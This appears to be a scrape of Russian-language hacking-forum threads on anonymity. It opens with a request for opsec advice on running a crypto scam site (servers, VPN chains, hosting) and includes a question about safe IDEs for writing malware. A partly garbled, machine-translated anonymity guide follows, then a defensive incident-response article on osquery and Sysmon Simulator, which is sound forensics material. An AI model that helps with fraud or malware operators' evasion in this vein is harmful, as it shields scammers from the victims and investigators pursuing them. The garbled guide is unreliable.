Какие меры безопасности нужно соблюдать для реализации криптосайта под скам? Нужно ли все действия делать с дедика?
Или подойдет дабл vpn - виртуалка(windows) - дабл vpn?
И подскажите где лучше брать хост\домен\дедик в таком случае?

Телефон, eSim, SIM, итд.

ID: 676533bbb4103b69df371998
Thread ID: 88596
Created: 2023-05-22T12:47:34+0000
Last Post: 2024-03-09T22:47:04+0000
Author: HNH CRYPTO
Replies: 22 Views: 1K

Всех приветствую, сидел все время на телефонах с системой ios, недавно нашел старенький ксяоми.
Есть ли какие-то кастомные прошивки для него? Чисто мессенджеры поставить, не хочу чтобы моя деятельность была на основном телефоне,
также максимально скрыть данные телефона.

Извиняюсь за глупые вопросы, пару раз сталкивался с устройствами андроид.

9 Баллов За Анонимность в Интернете !

ID: 676533bbb4103b69df3719bd
Thread ID: 105636
Created: 2024-01-12T10:19:40+0000
Last Post: 2024-01-25T22:08:33+0000
Author: M10
Prefix: Статья
Replies: 14 Views: 1K

Привет всем, уважаемые участники XSS._
В этой теме мы рассмотрим, как сохранить анонимность в Интернете. Конечно, не бывает 100% анонимности, но мы можем быть частично анонимными.
_
1. Использование VPN – самый быстрый, простой и безопасный вариант.

Это лучший и самый надежный адрес, позволяющий сохранить конфиденциальность вашего IP-адреса. Он выделяется среди лучших VPN-сервисов, его просто нужно доделать и подключить. VPN эффективно скрывает вашу реальную жизнь, назначая вам виртуальный IP-адрес, связанный с этой страной. (Рекомендуется Nord, Tor VPN)

Одним из самых больших преимуществ использования VPN является высокая скорость соединения. Другой способ, сверхмедленное измерение: вам нужно перейти к требуемой загрузке, чтобы перейти к публикации.

~

2. Прокси – медленный и небезопасный для торрентов

Прокси часто используются для доступа к геоблокированному контенту. Допустим, вы хотите отобразить что-то, что доступно только в определенной стране. Ваш компьютер отправляет запрос на отображение на веб-сайт. Однако прокси-сервер сам получает этот запрос и повторно отправляет его, используя IP-адрес этой страны. Как только прокси-сервер получает доступ, он отправляет вам полученные данные.

У прокси есть много недостатков. Поскольку они не могут шифровать ваш трафик, как VPN, они очень медленные и небезопасные. Они также бесполезны для загрузки торрентов, поскольку не скроют всю вашу активность от интернет-провайдера. Многие популярные сайты, такие как Hulu, могут легко обнаружить, что вы используете прокси-сервер, и заблокировать вам доступ.
~

3. Tor — бесплатно замаскируйте свой IP-адрес (недоступно для торрентов или потоковой передачи)

Если вы хотите оставаться анонимным в Интернете, ничего не платя, Tor — надежное решение. Он состоит из большой сети серверов, на которых работают волонтеры по всему миру. Когда вы используете Tor, пропуская свой трафик через несколько таких серверов и шифруя его различными номерами, ваш IP-адрес становится практически неотслеживаемым.

Но все это шифрование и дешифрование делает Tor невероятно медленным. Поэтому он бесполезен для потоковой передачи или загрузки. Также его разработчики не рекомендуют использовать его для торрентов. Если вы просто хотите пользоваться Интернетом, вы можете использовать Tor Browser или загрузить расширение Firefox. Однако для максимально возможного уровня конфиденциальности я рекомендую использовать Tor в сочетании с VPN.

~

4. Общественный Wi-Fi – последнее средство, рискованное

Ваш IP-адрес назначается вам вашим интернет-провайдером. Поэтому, если вы подключитесь к Интернету через другую сеть, вы получите новый адрес. Если вам нужно быстро и временно изменить свой IP-адрес, вы можете пойти в кафе или другое место с общедоступным Wi-Fi. Поскольку это общая ссылка, ваши действия не могут быть связаны с вами.

Кроме того, общедоступный Wi-Fi делает вас уязвимым для хакеров, вредоносных программ и всех других угроз безопасности. Вот почему я всегда рекомендую использовать VPN при подключении к общедоступному Wi-Fi. Кроме того, общедоступные сети Wi-Fi не помогают обойти геоблокировки. Таким образом, это скорее быстрое решение, а не долгосрочное решение.
~

5. Использование мобильной сети – обходной путь

Если у вас нет простого доступа к общедоступной беспроводной сети или вы предпочитаете не подвергаться таким рискам, вы также можете временно изменить свой IP-адрес, используя данные на своем мобильном устройстве вместо собственной беспроводной сети.

Основным недостатком этого метода является то, что он может быть дорогостоящим, особенно если вы хотите транслировать или загружать большое количество контента. Опять же, это далеко не окончательное решение, и я бы рекомендовал этот метод только в том случае, если вы считаете, что ваш обычный IP-адрес был скомпрометирован. В таком случае использование мобильной сети — это простой способ немедленно получить новый IP-адрес.

~
6. Отключите модем – сбросьте свой IP-адрес.

Это может показаться забавным, но иногда отключение модема от сети на некоторое время может изменить ваш IP-адрес. Когда вы отключаетесь от своего интернет-провайдера, соединение с вашим текущим IP-адресом удаляется. Однако это произойдет только в том случае, если ваш интернет-провайдер использует динамические IP-адреса (что они, вероятно, и делают).

Отключите модем как можно дольше, так как это увеличивает вероятность изменения вашего IP-адреса. Когда вы снова подключите его, вы должны получить новый IP-адрес. Однако это не самый надежный метод, поэтому он не должен быть вашим первым выбором.

~
7. Обновите свой IP-адрес – следуйте инструкциям ниже.

Выше я сказал, что ваш основной IP-адрес общедоступен. Однако если вы используете беспроводную сеть или кабель Ethernet, у вас также есть частный IP-адрес. Этот метод работает только для изменения частного, он не работает для публичного.

Если вы хотите получить новый частный IP-адрес, все, что вам нужно сделать, это ввести несколько команд на своем компьютере.
~
8. Используйте брандмауэр NAT – скройте свой частный IP-адрес

Как и предыдущий метод, этот вариант применим только к вашему частному IP- адресу. Брандмауэр NAT (трансляция сетевых адресов) позволяет различным устройствам использовать один и тот же общедоступный IP-адрес, сохраняя конфиденциальность своих частных IP-адресов. Другими словами, несколько устройств, подключенных к одному маршрутизатору, могут иметь общий IP-адрес.

Основное преимущество NAT заключается в том, что он защищает вас от получения нежелательных сообщений от неизвестных пользователей Интернета, которые могут быть вредоносными. Однако он не скрывает общедоступный IP-адрес вашего устройства, что является самым важным, когда речь идет о конфиденциальности в Интернете. Как я уже говорил, лучший способ сделать это — использовать VPN.

~

9. Вежливо попросите своего интернет - провайдера изменить его.

Изменение адреса, поскольку ваш интернет-сервис назначает ваш IP-адрес. Необходимо рассчитываться непосредственно с этим человеком. Это простая часть изменения вашего IP-адреса, если вы заблокировали его, как VPN, или у вас есть проблемы с безопасностью.

Если ваш интернет-провайдер использует пользователей с динамическим IP- адресом, не забудьте согласовать этот адрес. Попробуйте то же самое, что и статический IP-адрес. Но эти траты очень целенаправленные и в некоторой степени целенаправленные

Session (https://getsession.org), проблема анонимности

ID: 676533bbb4103b69df3719c3
Thread ID: 100872
Created: 2023-10-25T00:25:28+0000
Last Post: 2024-01-21T01:29:38+0000
Author: BlackByte
Replies: 17 Views: 1K

Палит вашу маршрутизацию "в мир", включая все IP (включая внутренние) "по дороге". Для деятелей, любящих устраивать срач на форуме — скажу сразу: под "палит" понимается доступ к, и откровенный вывод соответствующего окна GUI "в лоб" показывающего ваш текущий маршрут (без IP адресов). Сливается ли куда-то эта информация или нет — не изучал, но такое поведение не понравилось априори. Снёс.

Опасно (не анонимно) ли использовать IDE для разработки незаконного ПО?

ID: 676533bbb4103b69df3719c7
Thread ID: 105519
Created: 2024-01-10T19:54:00+0000
Last Post: 2024-01-13T19:09:59+0000
Author: Android_2025
Replies: 25 Views: 1K

Все ли IDE/Редакторы кода и т. д ,безопасны для разработки malware и тому подобнного, если нет, то какие можете посоветовать (языки C, C#, C++, Python)

Илюзия Анонимности

ID: 676533bbb4103b69df3719c9
Thread ID: 103679
Created: 2023-12-07T12:42:13+0000
Last Post: 2024-01-11T18:31:16+0000
Author: Psycopath
Replies: 20 Views: 1K

Приветствую всех на форуме, не давно начал интересоватсья темой анонимности и постоянно прихожу к выводу что её просто не существует. Тут зависит от самого ползователя и от его целей, например если кто не хочет чтоб ютуб не знал его ай пи аддресса, ОС, версию браузера то это реалезуемо. Но речь идёт о тотальной анонимности.

Существует несколько методов получеия анонимности, тот же самый Тор, ВПН, прокси, а так же Opsec в добавок ко всему, но всё это отслеживается. Например тот же самый ВПН, когда идет речь об организации по типу "NordVPN" то они точно не станут противастоять ФБР и выдадут IP подазреваемого без каких либо калибаний, им это не выгодно.

Ещё можно сделать свой ВПН, на это же самом форуме купить VPS за XMR всё настроить и вуаля! у нас свой ВПН который пренадлежит только нам, но не стоит забывать что этот VPS находится под Хостером, и даже если мы настроили ВПН без логов и ФБР нечего на этом сервере не найдёт, то у хостера 100% есть логи подключений. ФБР их запросит у них будет наш IP.
То же самое и с прокси серверами не важно сколько серверов в нашей цепочке будет их всё равно можно будет отследить до начального подключения. даже если буде разные хостеры.

А насчёт тора тоже присутсвуют сомнения ведь мы не знаем кто контролирует входные и выходные сервера. существует теория что часть луковой сети находится под контролем государств и правоохнательный органов.

Ещё любят говорить что надо подключатся с публичной сети но это тоже не работает, допустим ФБР отследила цепочку и нашли что подключения было из местного старбакса, они проверят камеры и увидт что в то же время когда было совершено подключения мы сиделт в этом старбаксе с ноутом, и даже если не только мы сидели с ноутами а 10 человек то мы всё равно будем в списку подазреваемых.

И тут возникает вопрос, возможно ли вообще достигнуть тотальнйю анонимность?

заранее прошу прощения за мой русский

Тактика шерлока! Incident response в системах Windows.

ID: 676533bbb4103b69df3719d5
Thread ID: 90558
Created: 2023-06-15T07:41:41+0000
Last Post: 2023-12-12T14:27:14+0000
Author: Gufi
Prefix: Статья
Replies: 8 Views: 1K

Содержание

1.Вступление

-Что такое криминалистика?

-Что такое Incident response?

-Популярность Incident response в системах windows.

2.Криминалистика и спецслужбы

-SOC и Blue team

-КБ конторы и алярм от провайдеров

-Как спецслужбы находят злоумышленников

3.Использование инструментов для криминалистики.

-Sysmon simulator

-Osquery

-Системные инструменты логирования Windows

4.Ищем следы вторжения , и смотрим логи

-Действия с файлами

-Сетевые подключения

-Действия с учетными данными

-Ищем бекдоры во взломаной системе

5.Реверсинг мальварей

-Ищем подозрительные процессы

-Ищем последние сетевые подключения

-Ищем следы применения зловреда

6.Создание криминалистической цепочки.

-Поиск источника появления вторжения

-Поиск исходного узла получения данных

-Навыки и применение Osint

7.Создание репорта с найденой информацией.

-Учимся сдавать доклады

-Входные и выходные данные при процессе.

-Итоги расследования

Вступление
Что такое криминалистика?

Криминалистика в кибербезопасности – процесс анализа вторжения и взлома компьютерной системы.
Также при криминалистике , очень интересным этапом процесса выступает построение криминалистической цепочки и деанон лиц (участников вторжения)

Что такое Incident response?

Incident response – это процесс реагирования на вторжения , атаки. А также процесс анализа угрозы.
Основные этапы реагирования на вторжения:

-Обнаружение угрозы

-Оценка критичности угрозы

-Поиск следов вторжения

-Создание цепочки следов

-Создание отчета об расследовании

Типы вторжений и инцидентов безопасности:

-Несанкционированные попытки доступа к системам или данным.

-Атаки с повышением привилегий.

-Внутренние угрозы .

-Фишинговые атаки.

-Атаки вредоносных программ.

-Атаки типа «отказ в обслуживании» ( DoS ).

-Атаки «человек посередине» .

-Атаки на пароли.

-Атаки на веб-приложения.

-Расширенные постоянные угрозы

Цель реагирования - быстро и эффективно реагировать на киберинциденты, минимизировать ущерб и восстановить нормальное функционирование системы или сети.

Популярность Incident response в системах windows.

В последнее время после атак APT и Ransomware группировок , актуальность этапа incident response , выросла на 50%.

Тем более , как мы знаем, большинство атак направленны на системы с ОС Windows. Для этого мы будем использовать такие инструменты как Sysmon Simulator и Osquery.
Incident response в системах Windows направлен на обнаружение, реагирование и устранение киберугроз, а также восстановление нормальной работы системы после инцидента.
Популярность инцидентного реагирования в системах Windows обусловлена широким распространением этой операционной системы и необходимостью эффективной защиты компьютеров и сетей от кибератак.

Некоторые инструменты в системе Windows , которые применяют при incident response:

Событийные журналы (Event Logs): Windows ведет журналы событий, которые регистрируют различные активности и процессы в системе. Они могут содержать полезную информацию, которая помогает выявить подозрительную активность или индикаторы компрометации.

Windows Defender и антивирусные программы: Windows поставляется с встроенным антивирусным программным обеспечением - Windows Defender. Оно обеспечивает защиту от вредоносных программ и может реагировать на обнаружение угроз, предпринимая соответствующие меры.

Windows Event Forwarding: Эта функция позволяет собирать и отправлять журналы событий с нескольких компьютеров в централизованное хранилище. Это облегчает мониторинг и обнаружение инцидентов на различных системах Windows.

PowerShell: PowerShell - мощный инструмент командной строки в Windows, который может использоваться для автоматизации задач и анализа системных данных. Он может быть полезен при инцидентном реагировании для выполнения задач по обнаружению и анализу инцидентов.

Также с помощью инфраструктуры Active Directory , мы можем массово логировать и анализировать вторжения и атаки.

Криминалистика и спецслужбы
SOC и Blue team

Как мы знаем , сейчас в новых модных канторах по кибербезопасности , есть 3 главных команды:

-Red team: Red team – это команда пентестеров , то есть “атакующая команда” , которая тестирует систему на безопасность используя тактики злоумышленника (хакера).
-Blue team: Blue team – это команда “защитников или безопасников”, которая анализируя написанный командой Red Team репорт , ищет уязвимые места в системе , анализирует их , и ставит комплекс защиты для этой уязвимости.
-SOC team: Команда мониторинга и быстрого реагирования на инциденты , цель этой команды – мониторинг системы , и в случае атаки или вторжения , быстро среагировать на инцидент и деактивировать угрозу до того , как злоумышленник не наделал шуму.

Incident response очень полезен для SOC и Blue team команд , потому что тактики криминалистики и быстрого реагирования на кибервторжения будут обязательны для SOC team для быстрого выявления вторжения и для анализа атак.
Incident response является частью процесса реагирования на инциденты, которая включает в себя действия SOC и Blue team для обнаружения, анализа и устранения проблемы в случае кибератаки или кибервторжений.

КБ конторы и алярм от провайдеров

Как мы знаем , почти все провайдеры – это ручные куколки для спецслужб , также у меня есть несколько историй , когда провайдер ловит триггер из за простых действий даже в локальной сети!
Провайдеры услуг связи и интернета могут предоставлять системы и услуги, которые обеспечивают обнаружение и предупреждение о потенциальных угрозах и инцидентах безопасности.

Это может включать системы мониторинга сетевой активности, обнаружение вредоносного программного обеспечения, анализ трафика и другие механизмы, предназначенные для выявления подозрительной активности или аномалий в сети. Когда обнаруживается подозрительная активность, провайдеры могут предупреждать своих клиентов и принимать меры для снижения угрозы или предотвращения инцидента.

Как спецслужбы находят злоумышленников

Спецслужбы имеют разнообразные методы и стратегии для выявления и преследования злоумышленников. Вот некоторые из наиболее распространенных подходов:

Мониторинг и анализ сетевой активности: Специалисты по кибербезопасности осуществляют наблюдение за сетевой активностью, включая сетевой трафик, журналы событий и системные логи. Они ищут подозрительные образцы и аномалии в сетевой активности, которые могут указывать на наличие злоумышленников. Это может включать обнаружение необычного поведения, попыток несанкционированного доступа, использование вредоносных программ и передачу конфиденциальной информации.
Цифровое следствие: Специалисты по цифровому следствию проводят анализ цифровых следов, которые оставляют злоумышленники на компьютерах, мобильных устройствах и в сетевых данных. Они используют специализированные инструменты и методы для восстановления удаленной информации, исследования файловых систем, регистров и других цифровых следов, чтобы выявить активности злоумышленников, их методы и мотивы.
Сотрудничество с информаторами: Спецслужбы могут устанавливать контакты с информаторами, которые имеют доступ к важной информации о преступной деятельности и злоумышленниках. Информаторы могут предоставлять ценные сведения о личностях, связях, операциях и планах злоумышленников. Эта информация помогает спецслужбам направить свои расследования, сосредоточиться на наиболее значимых угрозах и лучше понять деятельность преступников.
Международное сотрудничество: Злоумышленники часто действуют на глобальном уровне, поэтому спецслужбы сотрудничают с другими правоохранительными органами и разведывательными службами в рамках международных партнерств. Это позволяет обмениваться информацией, координировать действия и обнаруживать злоумышленников, которые могут перемещаться и действовать за пределами территории одной страны.
Использование технологий и аналитики данных: Спецслужбы применяют широкий спектр технических инструментов и программного обеспечения для обнаружения и анализа данных. Это может включать системы мониторинга сетевой активности, средства обнаружения вредоносного программного обеспечения, инструменты анализа больших данных и искусственного интеллекта. Такие технологии помогают автоматизировать процессы обнаружения, фильтрации и анализа данных, чтобы выделить потенциально важные индикаторы компрометации и определить цели и методы злоумышленников.

Использование инструментов для криминалистики
Sysmon simulator

Sysmon Simulator - это инструмент, разработанный для имитации поведения Sysmon, утилиты мониторинга и регистрации событий в операционных системах Windows. Sysmon предоставляет детализированную информацию о различных событиях, происходящих в системе, таких как запуск процессов, соединения сети, изменения в реестре и другие активности, которые могут быть связаны с безопасностью и аномальной активностью. Этот инструмент очень полезен при Incident response в системах Windows , тем что позволяет мониторить изменения и активность в системе.

Основные преимущества Sysmon Simulator:

-Тестирование правил мониторинга: Sysmon Simulator позволяет тестировать и проверять правила мониторинга Sysmon, чтобы убедиться, что они правильно настроены и эффективно обнаруживают подозрительную активность. Это помогает снизить количество ложных срабатываний и улучшить общую эффективность системы мониторинга.

-Имитация различных сценариев: С помощью Sysmon Simulator можно создавать разнообразные сценарии и симулировать события, которые могут быть связаны с атаками, вредоносной активностью или необычным поведением. Это позволяет проверить, как правила мониторинга реагируют на эти события и помогает идентифицировать уязвимости или проблемы в системе безопасности.

-Улучшение общей безопасности: Sysmon Simulator помогает повысить уровень безопасности системы, позволяя проводить более точные и точные тесты мониторинга. Это может помочь выявить и предотвратить атаки, обнаружить необычное или вредоносное поведение и обеспечить реакцию на подозрительную активность.

-Обучение и обучение персонала: Sysmon Simulator также может использоваться в образовательных целях для обучения персонала по кибербезопасности. Он позволяет создавать учебные сценарии и демонстрировать, как различные события и действия могут быть обнаружены и анализированы с помощью Sysmon и связанных инструментов.

Установка Sysmon Simulator:
Возможности и параметры Sysmon Simulator:

Для использования инструмента , нам нужно запустить его с флагом -eid

Инструмент запускаем через powershell командой ./SysmonSimulator.exe -eid <event id>
Event id:

-eid 1 : Process creation

-eid 2 : A process changed a file creation time

-eid 3 : Network connection

-eid 5 : Process terminated

-eid 6 : Driver loaded

-eid 7 : Image loaded

-eid 8 : CreateRemoteThread

-eid 9 : RawAccessRead

-eid 10 : ProcessAccess

-eid 11 : FileCreate

-eid 12 : RegistryEvent – Object create and delete

-eid 13 : RegistryEvent – Value Set

-eid 14 : RegistryEvent – Key and Value Rename

-eid 15 : FileCreateStreamHash

-eid 16 : ServiceConfigurationChange

-eid 17 : PipeEvent – Pipe Created

-eid 18 : PipeEvent – Pipe Connected

-eid 19 : WmiEvent – WmiEventFilter activity detected

-eid 20 : WmiEvent – WmiEventConsumer activity detected

-eid 21 : WmiEvent – WmiEventConsumerToFilter activity detected

-eid 22 : DNSEvent – DNS query

-eid 24 : ClipboardChange – New content in the clipboard

-eid 25 : ProcessTampering – Process image change

-eid 26 : FileDeleteDetected – File Delete logged

Osquery

Osquery - это открытое программное обеспечение, которое позволяет выполнять SQL-подобные запросы для исследования и анализа операционных систем. Оно предоставляет структурированное представление различных аспектов операционной системы, таких как процессы, сетевые соединения, файлы, реестр и многое другое. Osquery позволяет анализировать и исследовать систему, а также обнаруживать необычную активность или наличие вредоносных программ.

Вот несколько ключевых моментов о применении Osquery:

Операционные системы: Osquery поддерживает различные операционные системы, включая Windows, macOS, Linux и FreeBSD. Он предоставляет единый интерфейс для анализа и запросов данных операционной системы, независимо от платформы

SQL-подобные запросы: Osquery использует SQL-подобный язык запросов для извлечения информации о системе. Пользователи могут написать запросы, используя знакомый SQL-синтаксис, чтобы получить данные о процессах, сетевых соединениях, файлах, реестре и других аспектах операционной системы.

Схема данных: Osquery предоставляет схему данных, которая описывает доступные таблицы и столбцы для запросов. Схема данных помогает пользователям понять, какую информацию можно получить и как организована структура данных.

Обнаружение необычной активности: Osquery может быть использован для обнаружения необычной активности или вторжений в систему. Путем написания запросов и анализа данных, пользователи могут искать аномалии, необычные соединения, подозрительные файлы или процессы, которые могут указывать на наличие вредоносных программ или атак.

Интеграция с системами мониторинга и реагирования: Osquery может быть интегрирован с системами мониторинга и реагирования на инциденты, такими как Security Information and Event Management (SIEM) или Security Orchestration, Automation, and Response (SOAR). Это позволяет автоматизировать анализ данных Osquery и принимать меры по реагированию на обнаруженные события.

Установка Osquery:

Установка под Windows: https://pkg.osquery.io/windows/osquery-5.8.2.msi

Установка под MacOS: https://pkg.osquery.io/darwin/osquery-5.8.2.pkg

Установка под Linux: https://pkg.osquery.io/linux/osquery-5.8.2_1.linux_x86_64.tar.gz

Основные команды для использования в osquery:

osquery: Выполнить SQL-запрос к базе данных osquery.

osquery> SELECT * FROM processes WHERE name = 'osqueryd';

tables: Вывести список доступных таблиц.

osquery> .tables

schema: Вывести схему таблицы.

osquery> .schema processes

version: Вывести версию osquery.

osquery> .version

help: Вывести справку по доступным командам.

osquery> .help

exit: Выйти из интерфейса osquery.

osquery> .exit

Основные таблицы, предоставляемые osquery:

processes: Информация о процессах, запущенных на системе.

services: Информация о службах (сервисах), работающих на системе.

users: Информация о пользователях, зарегистрированных на системе.

groups: Информация о группах пользователей на системе.

file_systems: Информация о файловых системах на системе.

registry: Информация о реестре (для систем Windows).

network_connections: Информация о сетевых соединениях.

logged_in_users: Информация о вошедших в систему пользователях.

software: Информация о установленном программном обеспечении.

Системные инструменты логирования Windows

Event Viewer (Просмотр событий) - это инструмент, встроенный в операционные системы Windows, который позволяет просматривать и анализировать журналы событий компьютера. Журналы событий содержат информацию о различных событиях, происходящих в операционной системе и приложениях.

Для запуска этого инструмента , открываем окно “выполнить” через комбинацию win+r и запускаем eventvwr.msc

Возможности инструмента:

Просмотр и анализ журналов событий: Вы можете просматривать различные журналы событий, включая журналы системы, безопасности, приложений и журналы служб. Это позволяет вам получить общую информацию о происходящих событиях в операционной системе и приложениях.

Фильтрация и поиск событий: Event Viewer позволяет фильтровать события по различным параметрам, таким как тип события, источник, уровень важности и другие атрибуты. Вы также можете использовать поиск для быстрого нахождения конкретных событий или ключевых слов в журналах.

Просмотр подробностей событий: Вы можете просмотреть подробности каждого события, включая его идентификатор, дату и время, источник, описание и дополнительные сведения. Это помогает в анализе и понимании событий, происходящих в системе.

Создание и настройка задач: Event Viewer позволяет создавать задачи, которые выполняются при определенных событиях. Например, вы можете создать задачу для отправки уведомления или запуска скрипта при возникновении определенного типа события.

Экспорт и импорт данных: Вы можете экспортировать журналы событий в файлы форматов, таких как XML или CSV, для дальнейшего анализа или обмена информацией с другими пользователями. Также можно импортировать журналы событий, чтобы проанализировать их на другой системе.

Просмотр и анализ аудиторских записей: Event Viewer позволяет просматривать аудиторские записи, которые регистрируют действия пользователей и изменения в системе. Это помогает в обеспечении безопасности и проверке соответствия.

Ищем следы вторжения , и смотрим логи
Действия с файлами

Один из первых шагов при анализе следов вторжения - это изучение действий, связанных с файлами.
Это может быть создание файлов , изменение файлов , удаление файлов , перемещение файлов.

Sysmon Simulator:
По очереди запускаем:

./SysmonSimulator -eid 2

(Процесс изменения файлов)

./SysmonSimulator -eid 11

(Создание файлов)

./SysmonSimulator -eid 15

(ADS создание файла)

./SysmonSimulator -eid 26

(Процесс удаления файла)

Osquery:
SELECT * FROM file

Также настройка FIM (File Integrity Monitoring)
Добавим в конфиг файл (Osquery.conf) эти строчки:

JSON:Copy to clipboard

{ "options": { "config_plugin": "filesystem", "logger_plugin": "filesystem", "logger_path": "/var/log/osquery", "disable_logging": "false", "log_result_events": "true", "schedule_splay_percent": "10", "pidfile": "/var/osquery/osquery.pidfile", "events_expiry": "3600", "database_path": "/var/osquery/osquery.db", "verbose": "false", "worker_threads": "2", "enable_monitor": "true", "disable_events": "false", "disable_audit": "false", "audit_allow_config": "true", "host_identifier": "hakase-labs", "enable_syslog": "true", "syslog_pipe_path": "/var/osquery/syslog_pipe", "force": "true", "audit_allow_sockets": "true", "schedule_default_interval": "3600", "enable_file_events": "true" }, "schedule": { "crontab": { "query": "SELECT * FROM crontab;", "interval": 300 }, "file_events": { "query": "SELECT * FROM file_events;", "removed": false, "interval": 300 } }, "file_paths": { "homes": [ "/root/%%", "/home/%%" ], "etc": [ "/etc/%%" ], "tmp": [ "/tmp/%%" ] }, "exclude_paths": { "homes": [ "/home/not_to_monitor/.ssh/%%" ], "tmp": [ "/tmp/too_many_events/" ] } }

Event viewer:

Откройте "Event Viewer" (Просмотр событий). Для этого нажмите Win + R, введите "eventvwr.msc" и нажмите Enter, или найдите "Event Viewer" в меню "Пуск".
В окне "Event Viewer" в левой панели выберите "Windows Logs" (Журналы Windows) и затем выберите журнал, связанный с файловыми операциями. Несколько распространенных журналов, связанных с файлами:

"Security" (Безопасность): Регистрирует события, связанные с безопасностью, включая операции с файлами, такие как попытки доступа, изменения разрешений и т.д.

"Application" (Приложения): Регистрирует события, связанные с приложениями, которые могут включать операции с файлами.

"System" (Система): Регистрирует события, связанные с системой, которые могут содержать информацию о файловых операциях, связанных с драйверами и службами.

В правой панели "Event Viewer" будут отображаться события, относящиеся к выбранному журналу. Щелкните правой кнопкой мыши на событии, чтобы просмотреть подробности операции с файлом.
В окне подробностей события ищите поля, связанные с файлами. Обычно информация о файле включает путь к файлу, имя файла, тип операции (например, чтение, запись, удаление), идентификатор пользователя и другие детали.

Сетевые подключения

Sysmon simulator:
./SysmonSimulator -eid 3
(Информация об сетевых подключениях)
./SysmonSimulator -eid 22
(Информация об DNS запросах)

Osquery:
SELECT * FROM socket_events
SELECT * FROM listening_ports
SELECT * FROM process_open_ports

Event Viewer:
Откройте "Event Viewer" (Просмотр событий). Для этого нажмите Win + R, введите "eventvwr.msc" и нажмите Enter, или найдите "Event Viewer" в меню "Пуск".
В окне "Event Viewer" в левой панели выберите "Windows Logs" (Журналы Windows) и затем выберите журнал, связанный с сетевыми событиями. Несколько распространенных журналов, связанных с сетью:

"Security" (Безопасность): Регистрирует события, связанные с безопасностью, включая сетевые события, такие как удачные или неудачные попытки подключения к ресурсам, использование протоколов безопасности и т.д.

"System" (Система): Регистрирует события, связанные с системой, которые могут содержать информацию о сетевых интерфейсах, соединениях, ошибках сети и других сетевых событиях.

В правой панели "Event Viewer" будут отображаться события, относящиеся к выбранному журналу. Щелкните правой кнопкой мыши на событии, чтобы просмотреть подробности сетевого события.
В окне подробностей события ищите поля, связанные с сетью. Обычно информация о сетевом событии включает IP-адреса, порты, протоколы, идентификаторы процессов и другие детали.

Действия с учетными данными

Sysmon Simulator:
./SysmonSimulator -eid 14
(Изменение ключей доступа в реестре)

Osquery:
SELECT * FROM registry WHERE key_path LIKE '%SAM\\SAM\\Domains\\Account\\Users\\%'

Event Viewer:
Откройте "Event Viewer" (Просмотр событий). Для этого нажмите Win + R, введите "eventvwr.msc" и нажмите Enter, или найдите "Event Viewer" в меню "Пуск".
В окне "Event Viewer" в левой панели выберите "Windows Logs" (Журналы Windows) и затем выберите журнал, связанный с безопасностью. Наиболее подходящий журнал для просмотра изменений учетных данных - "Security" (Безопасность).
В правой панели "Event Viewer" будут отображаться события, относящиеся к выбранному журналу. Для фильтрации только событий, связанных с изменениями учетных данных, выполните следующие действия:
Щелкните правой кнопкой мыши на журнале "Security".
Выберите "Filter Current Log" (Фильтр текущего журнала).
В открывшемся окне "Filter Current Log" в разделе "Event sources" (Источники событий) выберите "Security-Auditing".
В поле "Keywords" (Ключевые слова) введите число "4738" (это код события для изменения учетных данных).
Нажмите "OK" для применения фильтра.

Теперь в правой панели "Event Viewer" будут отображаться только события, связанные с изменениями учетных данных. Щелкните на каждом событии, чтобы просмотреть подробности изменений учетных данных, таких как имя пользователя, тип операции (создание, изменение или удаление учетной записи), время события и другая информация.

Ищем бэкдоры во взломанной системе

Вредоносные программы всегда оставляют за собой след в системе , этим следом могут быть:

-Левые процессы

-Файлы , созданы вредоносном обеспечением

-Логи сетевых подключений

-Изменения в системе распределения прав (Добавление администраторов и новых учетных записей)

Для поиска следов использования мальваря в системе , мы будем использовать такие инструменты: Osquery ,Sysmon Simulator

Osquery:
SELECT * FROM processes

С помощью этой команды мы выведем список запущенных процессов в системе.
Анализируя запущенные процессы , мы можем увидеть такую аномалию как Reverse shell или Bind shell. Это оболочки удаленного доступа к вашей системе.
Вероятно эти шеллы создались автоматически после запуска мальваря на вашей системе.

Также мы можем найти созданные файлы через инструмент Sysmon Simulator , очень часто эти файлы содержат в себе копии вредоносного кода , и созданы они самим мальварем.

./SysmonSimulator -eid 11
./SysmonSimulator – eid 15
(Sysmon Simulator покажет нам последние операции с файлами в системе)

Реверсинг мальварей
Ищем подозрительные процессы

Для дампа всех работающих процессов в системе , с помощью Osquery:
SELECT * FROM processes

Теперь мы можем увидеть такую информацию об процессах:

Column | Type | Description
---|---|---
pid| BIGINT| Process (or thread) ID
name| TEXT| The process path or shorthand argv[0]
path| TEXT| Path to executed binary
cmdline| TEXT| Complete argv
state| TEXT| Process state
cwd| TEXT| Process current working directory
root| TEXT| Process virtual root directory
uid| BIGINT| Unsigned user ID
gid| BIGINT| Unsigned group ID
euid| BIGINT| Unsigned effective user ID
egid| BIGINT| Unsigned effective group ID
suid| BIGINT| Unsigned saved user ID
sgid| BIGINT| Unsigned saved group ID
on_disk| INTEGER| The process path exists yes=1, no=0, unknown=-1
wired_size| BIGINT| Bytes of unpageable memory used by process
resident_size| BIGINT| Bytes of private memory used by process
total_size| BIGINT| Total virtual memory size
user_time| BIGINT| CPU time in milliseconds spent in user space
system_time| BIGINT| CPU time in milliseconds spent in kernel space
disk_bytes_read| BIGINT| Bytes read from disk
disk_bytes_written| BIGINT| Bytes written to disk
start_time| BIGINT| Process start time in seconds since Epoch, in case of error -1
parent| BIGINT| Process parent's PID
pgroup| BIGINT| Process group
threads| INTEGER| Number of threads used by process
nice| INTEGER| Process nice level (-20 to 20, default 0)
elevated_token| INTEGER| Process uses elevated token yes=1, no=0
Only available on Windows
secure_process| INTEGER| Process is secure (IUM) yes=1, no=0
Only available on Windows
protection_type| TEXT| The protection type of the process
Only available on Windows
virtual_process| INTEGER| Process is virtual (e.g. System, Registry, vmmem) yes=1, no=0
Only available on Windows
elapsed_time| BIGINT| Elapsed time in seconds this process has been running.
Only available on Windows
handle_count| BIGINT| Total number of handles that the process has open. This number is the sum of the handles currently opened by each thread in the process.
Only available on Windows
percent_processor_time| BIGINT| Returns elapsed time that all of the threads of this process used the processor to execute instructions in 100 nanoseconds ticks.
Only available on Windows
upid| BIGINT| A 64bit pid that is never reused. Returns -1 if we couldn't gather them from the system.
Only available on macOS
uppid| BIGINT| The 64bit parent pid that is never reused. Returns -1 if we couldn't gather them from the system.
Only available on macOS
cpu_type| INTEGER| Indicates the specific processor designed for installation.
Only available on macOS
cpu_subtype| INTEGER| Indicates the specific processor on which an entry may be used.
Only available on macOS
translated| INTEGER| Indicates whether the process is running under the Rosetta Translation Environment, yes=1, no=0, error=-1.
Only available on macOS

